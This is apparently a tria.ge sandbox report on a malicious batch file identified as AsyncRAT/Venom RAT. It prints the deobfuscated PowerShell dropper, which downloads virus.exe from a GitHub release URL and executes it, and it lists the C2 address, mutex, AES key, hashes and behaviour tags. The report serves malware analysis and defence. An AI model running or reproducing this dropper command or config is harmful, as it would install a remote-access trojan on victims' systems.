Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

test.bat

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    test.bat

  • Size

    171KB

  • Sample

    241210-2vakbsykeq

  • MD5

    50143263c2d75d9d835e7ee09d4206bb

  • SHA1

    5bc6c41e0f76004c48f1471d2d0dad7438cd72ab

  • SHA256

    7f3067fd568421d59b16e35bdd9cbe94b3be7ce8b77e06b5ed4475fc70c683da

  • SHA512

    1910b62136432ed8c26d050b4faf7d68d7b71fbc8bd190da9bb6cc9910ab0ff5a52882997832d50b7776e7cd017428fe86c1e0679b5c3100a686f5ba909d55b6

  • SSDEEP

    192:CnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnF:q

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$url = "https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe"
2
$output = "C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\virus.exe"
3
invoke-webrequest -uri $url -outfile $output
4
start-process -filepath $output -wait
5
URLs
exe.dropper

https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

66.66.146.74:9511

Mutex

8906005788005HTGF

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain
1
XesRYlphPGk0fRPQHQW5A8dUZSHRkkUq

Targets

    • Target

      test.bat

    • Size

      171KB

    • MD5

      50143263c2d75d9d835e7ee09d4206bb

    • SHA1

      5bc6c41e0f76004c48f1471d2d0dad7438cd72ab

    • SHA256

      7f3067fd568421d59b16e35bdd9cbe94b3be7ce8b77e06b5ed4475fc70c683da

    • SHA512

      1910b62136432ed8c26d050b4faf7d68d7b71fbc8bd190da9bb6cc9910ab0ff5a52882997832d50b7776e7cd017428fe86c1e0679b5c3100a686f5ba909d55b6

    • SSDEEP

      192:CnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnF:q

    Score
    10/10
    asyncratdefaultdiscoveryexecutionrat

    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers written in C#.

      ratasyncrat

    • Asyncrat family

      asyncrat

    • Async RAT payload

      rat

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

      execution

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery
    behavioral1

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.